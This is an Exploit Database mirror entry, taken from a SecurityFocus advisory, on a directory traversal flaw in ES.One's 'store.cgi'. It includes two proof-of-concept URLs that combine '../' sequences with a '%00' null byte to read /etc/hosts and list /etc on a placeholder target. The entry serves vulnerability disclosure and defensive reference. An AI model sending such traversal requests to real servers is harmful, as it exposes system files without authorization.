exploit-db-mirror/platforms/linux/remote/20636.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

11 lines
No EOL
536 B
Text
Executable file

source: http://www.securityfocus.com/bid/2385/info
It is possible for a remote user to gain read access to directories and files outside the root directory of ES.One. Requesting a specially crafted URL by way of 'store.cgi', composed of '/../' sequences and appended with '%00' will disclose an arbitrary directory.
http://target/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
^^ = Will obviously open the hosts file.
http://target/cgi-bin/store.cgi?StartID=../etc/%00.html
^^ = Will obviously list the /etc/ directory.